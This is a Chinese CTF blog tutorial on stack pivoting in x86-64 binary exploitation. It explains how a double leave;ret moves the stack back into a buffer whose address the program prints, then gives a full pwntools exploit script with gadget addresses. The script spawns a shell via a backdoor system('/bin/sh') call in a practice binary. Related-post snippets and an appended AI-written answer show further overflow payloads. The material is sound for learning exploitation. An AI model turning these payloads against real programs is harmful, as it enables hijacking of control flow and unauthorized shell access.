栈迁移之变相增加溢出长度(pwn入门)

最新推荐文章于 2025-08-06 14:45:27 发布
最新推荐文章于 2025-08-06 14:45:27 发布
阅读量1k 收藏 21
点赞数 33
CC 4.0 BY-SA版权
分类专栏: pwn 文章标签: 网络安全 安全 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2402_83422357/article/details/140011059

写在前面:

在上一篇博客开头提到了

很多时候,程序给的溢出空间不够,仅仅只能溢出到rbp,或者是返回地址,这个时候去构造rop链条打程序就行不通了,没有多余的空间给你去构造rop链条,那么我们可以使用栈迁移的技术,先在一个位置布置好rop链条,然后把程序的执行流迁移到我们布置好rop链条的位置,让程序执行流执行踏入我们布置好了的地方,就相当于之前的那种构造rop链条的手段,但是多了一个迁移栈步骤

栈迁移之任意地址写(pwn入门)_任意地址写攻击-优快云博客

现在我就来讲下这个栈迁移的步骤

分析一下程序,发现程序首先会有一个输出,输出变量buf的地址,然后有一个输入,输入的长度是0x60,刚刚好可以溢出覆盖到rbp和返回地址。

同时函数也有一个后门函数backdoor,里面可以去执行一个system的函数,传入参数“/bin/sh\x00”就可以提权了

如果说溢出空间足够的话,那么其实我们可以采用最基础的ret2text打程序

payload = b'a'*padding+ p64(rdi_ret) + p64(binsh_addr) +p64(ret)+p64(system_addr)

用这种rop链就可以打通了,但是关键在于这道题的溢出长度并没有那么多,最多只能溢出到返回地址,所以采用栈迁移来打

由于这里程序给了一个栈空间地址的打印,那么我们可以调试一下这里打印的地址到底在哪里

那么我讲下怎么打这个程序

由于这个程序本身是没有/bin/sh字符串的,我们可以把/bin/sh字符串写在栈上,写在0xab的位置,如下图所示

然后就是leave_ret的妙用的,在返回地址的位置填入leave_ret的gadgets片段,这个也是栈迁移的核心之一

也就是leave一共会执行两次

发现没,我们本身整个程序的话虽然说溢出的地方只能溢出到返回地址,但是现在的话,我们通过这个栈迁移实际上把这个rsp又移回到了原本栈空间的这个地方来,也就是可以输入数据的这个地方来,那如果我们已经在这里布置好了rop链,也就是pop_rdi binsh_addr ret backdoor那么我们就相当于是ret2text的打法了,不过是利用了一下栈迁移

所以说虽然本身只能溢出一个返回地址,我们通过一个leave指令的两次利用,改变这个rsp的内容又回到我们原本栈空间这个地方来,能够让程序再进行ret操作的时候直接踏入我们布置好的rop链,然后直接提权拿shell

所以可以直接写脚本了

首先的话先把对应的gadgets都找到,抓pop_rdi和ret

ropper -f test2 --search 'pop|ret' |grep ret

leave指令的地址的话在IDA里面随便找一个就行的

然后接受一下打印出来的栈空间的地址也就是rsp的地址

stack = int(p.recv(14),16)
print("stack -->" + hex(stack))

最后布置一下rop链,原理上面已经分析过了

payload = flat([
0x1,
pop_rdi,
stack + 0x28,
ret,
backdoor,
b'/bin/sh\x00'
])

payload = payload.ljust(0x50,b'\x00')
payload += flat([
stack,
leave
])

唯一需要提的一个点就是/bin/sh的地址的偏移是多少怎么找到的,就是这个stack + 0x28这个0x28偏移怎么找到的呢,其实就是在gdb里面调试一下就知道了

边调试边看我们这样子构造输入的/bin/sh的位置距离我们泄露出来的地址的位置的距离是多少,相减一下就可以了

exp:

from pwn import *

context(log_level = 'debug',arch = 'amd64',os = 'linux')

p=process("./test2")
elf = ELF("./test2")
p.recvuntil(b"str1 is ")
stack = int(p.recv(14),16)
print("stack -->" + hex(stack))

leave = 0x4011DD
pop_rdi = 0x000000000040126f
ret = 0x000000000040101a
backdoor = 0x401248
#backdoor = elf.sym.backdoor

payload = flat([
0x1,
pop_rdi,
stack + 0x28,
ret,
backdoor,
b'/bin/sh\x00'
])

payload = payload.ljust(0x50,b'\x00')

payload += flat([
stack,
leave
])
p.recvuntil("input2:")
sleep(0.3)
p.send(payload)
sleep(0.3)
p.interactive()

写在最后:

如果说,不给我们打印rsp也就是栈的地址呢,那我们怎么做?

我们可以把栈空间迁移到另外一部分可读可写(rw)的空间里面去操作呀

比如说哪些内容可读可写呢?.bss段就是常见的一个空间

我们就可以把栈迁移到.bss段去

迁移方式的话还是可以利用这个leave指令去操作,但是需要结合read函数了(输入函数)

原理和本质还是一样

CTFshow-PWN-溢出pwn49)两种方法+动调分析
Welcome To Myon'Blog !
06-09 1311
执行后,可以看到 0x80da000 往后部分为可读可写可执行权限。看似开了 canary 保护,实际没有,是 checksec 版本太老了,检测到 __stack_chk_fail 函数就算开了。看似和上一题一模一样,但是细心的小朋友应该注意到了,左边多出了很多函数,说明这个程序是静态接的,静态接就意味着没法去打 ret2libc了,还是无 system 无 /bin/sh,考虑打 ret2syscall。
pwn()
小明的小书包Ya
10-04 2573
pwn() 简单的溢出利用方法 程序没有开启任何保护 方法一:寻找程序中system的函数,再布局栈空间,最后成功调用system('/bin/sh') 方法二:将我们的shellcode写入bss段,然后用elf.bss()来获取bss段地址,从而程序流向到我们的shellcode 这里不用具体程序分析了,把payload分别写上 方法一:payload = 'a' * offset...
PWN入门学习之简单的溢出
2301_80718478的博客
06-28 1448
溢出PWN的一种最简单的漏洞,其最核心的点就是,程序在读取用户输入的时候没有对输入内容进行检测与限制,从而导致输入的数据写入内存时挤占了其它不属于该变量的内存位置,从而导致重要寄存器(如RBP、RIP)中记录的地址被破坏,导致函数执行完返回时发生错误(找不到这样一个地址),即发生段错误(Segment fault)。但是同时,我们可以利用改写RBP、RIP寄存器值的这一特性,将程序跳转至我们期望的地方去。
Pwn入门笔记(五)ROP
qq_33590156的博客
11-29 888
ROP32位的ROP64位的ROP 32位的ROP 这个在基础中提到过,此处写出是为了和64位的形成对比。通过在返回地址上写上函数PLT的地址来实现跳转到函数,调用函数时压入参数后会压入eip(返回地址),然后32位程序参数在上,所以结构如下图: 底-高地址-> c b a 实际调用函数中的返回地址eip dddd 原返回地址(r) system的plt表地址 原ebp (s) aaaa aaaaaaaaaaaaaaa… 顶-低地址-> …
PWN溢出
u012173720的博客
11-21 1678
Shellcode --修改返回地址,让其指向溢出数据中的一段指令 根据上面副标题的说明,要完成的任务包括:在溢出数据内包含一段攻击指令,用攻击指令的起始地址覆盖掉返回地址。攻击指令一般都是用来打开 shell,从而可以获得当前进程的控制权,所以这类指令片段也被成为“shellcode”。shellcode 可以用汇编语言来写再转成对应的机器码,也可以上网搜索直接复制粘贴,这里就不再赘述。下面...
pwn学习——ret2libc1
MrTreebook的博客
11-28 1396
pwn学习——ret2libc11.看一下程序的保护2.看一下main函数有没有溢出3.ROPgadget4.exp 1.看一下程序的保护 ➜ ret2libc1 checksec ret2libc1 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 2.看一
Linux PWN技巧之迁移
小小鱼的博客
02-16 1995
简介 迁移简单将就是控制EBP/RBP、ESP/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现控制上执行内容、控制程序执行流程的目的。 迁移一般会将帧指向bss段(其他可读写内存段也可以),这种技巧是为了解决上空间太小,不够写入完整payload的情况。比如有个程序存在溢出的漏洞,但溢出长度不够,只够覆盖到返回地址,不能读入完整的rop,这种情况就可能要用到迁移的技巧了 利用介绍 以32位程序为例,描述一下迁移的核心思想。 首先要理解leave和ret汇编指令的作用: lea
PWN入门迁移-附件资源
03-02
PWN入门迁移-附件资源
CTFshow-PWN入门-溢出pwn35~pwn40
weixin_63576152的博客
08-22 1630
本文主要详解CTFshow中pwn入门系列的溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
CTFSHOW-PWN入门-溢出(35-42)
2402_84585385的博客
10-09 1030
发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x80487BA。发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x400872。ctfshow函数中的,v1大小为14,而read函数读取大小为50,所以read函数存在溢出,使用cyclic计算偏移量为22。ctfshow函数中的read函数存在溢出,cyclic计算偏移量为18。
Linux pwn入门教程(1)——溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——溢出基础
溢出入门到放弃(下)
zhaoqg666的博客
04-25 1537
转自https://zhuanlan.zhihu.com/p/25892385 0x00 写在前面 首先还是广播一下2017 Pwn2Own 大赛的最终赛果,本次比赛共发现51个漏洞,长亭安全实验室贡献11个,以积26分的总成绩,在11支参赛团队中名列第三!同时,也祝贺国内的安全团队包揽本次大赛的前三名! 0x10 上期回顾 上篇文章介绍了溢出的原理和两种执行方法,两种方
Pwn基础学习1-[溢出]/篇2
m0_52343643的博客
03-29 2504
继上一篇的内容 题目3-ret2syscall 定义 控制程序执行系统调用 原理 不同于之前的 ret2text 和 ret2shellcode 题型,系统调用并不是执行程序中现有的代码或自己写进去的代码,其实就如其字面意思,系统调用就是我们让系统来调用一些函数,那么如何做到让系统来调用,需要满足以下几个条件: 某函数的系统调用号【系统调用号表】—— 放在寄存器 eax 需传入某函数的参数 —— 放在寄存器 ebx、ecx、edx 一个指令 —— int 0x80 int 0x80(软中断)
PWN入门溢出
weixin_44681716的博客
03-12 1299
PWN入门 先利用IDA对pwn文件进行静态调试 对pwn文件进行反编译 因为CFT是夺旗赛,所以我们首先要找到get flag的函数 利用gdb进行动态调试 我们就可以利用溢出获取系统权限 利用通过输入大量的字符来使其达到溢出,判断溢出的位置,从而获得长。 我们利用cyclic length函数产生若干个有序字符。 利用cyclic 300产生300个有序字符。 用gdb来运...
2017湖湘杯pwn200_wp_格式化字符串漏洞
aptx4869_li的博客
01-02 1649
本文是格式化字符串漏洞的利用,题目为2017年湖湘杯pwn200,题目文件 接:https://pan.baidu.com/s/1geZAemZ 密码:b51f 0x0001 看文件类型为elf文件,用  binwalk  查看一下: 一个32位的文件,用IDA看看: main函数: sub_80485CD()
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8744
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
星图云开发者平台赋能商储油安全管控数字化转型
DevMate的博客
08-05 343
某商业储备油分公司是其集团公司国家原油商业储备的生产经营主体,肩负着15座跨省市油库的安全管理重任。在传统管理模式下,总部对分散库区的监管面临严峻挑战:由于地理位置分散,储罐液位波动、设备异常运行等关键状态无法实时获取,往往依赖人工逐级上报导致决策滞后;各库区独立建设的安防系统、设备监测平台数据格式互不兼容,标准不统一,形成数据协同壁垒;当突发泄漏或火灾险情时,应急资源调度依赖电话协调与纸质预案,响应效率难以满足快速处置要求。
数字取证和网络安全:了解两者的交叉点和重要性
最新发布
2302_82041293的博客
08-06 588
当代社会的数字格局在很大程度上依赖于数字取证和网络安全。由于人们对技术和互联网的依赖不断升级,网络威胁和攻击的风险大大增加。了解数字取证和网络安全的交叉点对于保护您和您的组织免受网络威胁至关重要。
Goby 漏洞安全通告| NestJS DevTools /inspector/graph/interact 命令执行漏洞(CVE-2025-54782)
m0_46699477的博客
08-05 210
其 /inspector/graph/interact 接口存在远程代码执行漏洞(CVE-2025-54782)。攻击者可以通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。该漏洞允许攻击者通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。
ctfshow pwn入门溢出
04-02
<think>嗯,用户想学习CTFShow平台上的PWN入门溢出攻击技巧,包括教程、原理和实例。好的,我需要先回顾溢出的基本原理,然后结合CTFShow的题目例子来解释。首先,溢出是覆盖返回地址来控制程序流程,对吧?比如覆盖返回地址为system函数,然后传入/bin/sh的参数。 那我要分步骤来讲解。可能先讲的结构,比如函数调用时的返回地址、局部变量这些。然后,如何通过溢出覆盖返回地址。可能需要提到缓冲区溢出,比如使用gets、scanf等不安全的函数导致输入超出缓冲区大小。 接下来,结合CTFShow的题目,比如pwn41到pwn48,这些题目可能涉及不同的利用技巧。例如,引用4提到bss段的buf2可以用来存储输入数据,传入/bin/sh给system。这可能是一个例子,需要具体说明如何构造payload,将参数放入合适的位置,并跳转到system函数。 用户可能还需要了解如何找到system函数的地址,以及如何获取/bin/sh字符串的地址。可能需要用到ROP技术,或者题目中已经提供了这些地址。另外,要注意内存保护机制,比如NX、ASLR,但入门题目可能这些保护都没开,所以可以直接执行上的代码或者覆盖返回地址。 然后,可能需要给出一个具体的例子,比如如何利用溢出执行system("/bin/sh")。步骤大概是:确定溢出点,计算偏移量,找到system地址,找到/bin/sh字符串地址,构造payload填充缓冲区并覆盖返回地址为system,同时传递参数。 此外,用户可能需要知道如何调试,使用gdb或者其他工具来确定偏移量和地址是否正确。还有,如何构造payload,比如使用Python的struct模块来打包地址为大端或小端格式,取决于目标架构。 可能的问题点包括:确定偏移量的正确位置,处理地址中的空字符,确保参数正确传递(比如32位和64位传参方式不同)。例如,32位下参数在中,而64位可能使用寄存器。但CTFShow的题目可能都是32位的,或者需要根据具体情况调整。 最后,要提醒用户注意实践时的细节,比如输入的处理,避免截断,以及利用现有的函数和字符串。可能还需要提到如何查找gadgets,但入门题可能不需要复杂的ROP,直接覆盖返回地址即可。 总结一下,回答的结构应该是先讲原理,再结合实例分步骤说明,最后给出相关问题和引用。需要确保LaTeX格式正确,比如寄存器用$eax$,地址用$0xdeadbeef$这样的格式。代码块用Python示例如何生成payload,可能还要提到如何利用题目中的特定函数或缓冲区。</think>### CTFShow PWN入门 溢出攻击技巧解析 #### 一、溢出基本原理 溢出是通过覆盖函数返回地址实现控制流劫持的技术。当程序使用不安全函数(如`gets`/`scanf`)时,若未对输入长度做限制,攻击者可构造超长输入覆盖帧中的返回地址,使其指向恶意代码或系统函数。例如,覆盖返回地址为`system("/bin/sh")`可实现获取shell[^4]。 帧结构示例: $$ \text{低地址} \rightarrow \text{缓冲区} \rightarrow \text{EBP} \rightarrow \text{返回地址} \rightarrow \text{高地址} $$ #### 二、攻击步骤拆解 1. **确定溢出点**:通过调试工具(如`gdb`)计算缓冲区到返回地址的偏移量。 - 使用`pattern create`生成测试字符串,观察崩溃时寄存器的值。 2. **获取关键地址**: - `system`函数地址:通过`objdump -d`或`gdb`的`p system`获取。 - `/bin/sh`字符串地址:若程序中存在可直接引用,否则需自行写入。 3. **构造Payload**: - 填充缓冲区至返回地址位置。 - 覆盖返回地址为`system`地址。 - 传递参数(如`/bin/sh`地址)。 #### 三、实例分析(以CTFShow pwn41为例) **题目场景**: 程序中存在`buf2`缓冲区(位于.bss段),可利用其存储`/bin/sh`字符串,并通过溢出调用`system`。 **攻击流程**: 1. **计算偏移量**: 通过调试确定`buf`到返回地址的偏移为`140`字节。 2. **构造Payload**: ```python from pwn import * system_addr = 0x08048460 # system函数地址 buf2_addr = 0x0804A080 # buf2地址 payload = b'A' * 140 + p32(system_addr) + p32(0xdeadbeef) + p32(buf2_addr) # p32(0xdeadbeef)为system返回地址,此处无意义 # p32(buf2_addr)为system的参数地址 ``` 3. **写入`/bin/sh`到buf2**: 若程序提供输入点,可提前将`/bin/sh`写入`buf2`。 #### 四、关键知识点 1. **函数调用约定**: - 32位程序:参数通过传递,调用格式为`system(返回地址, 参数)`。 - 64位程序:参数优先通过寄存器(`rdi`, `rsi`等)传递,需用ROP控制。 2. **内存保护绕过**: - 若开启NX(不可执行),需通过ROP实现攻击。 - 若开启ASLR,需泄露地址或使用固定地址函数。 #### 五、防御与优化 - 使用安全函数(如`fgets`替代`gets`)。 - 开启编译保护选项(`-fstack-protector`)。 - 地址随机化(ASLR)和不可执行(NX)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值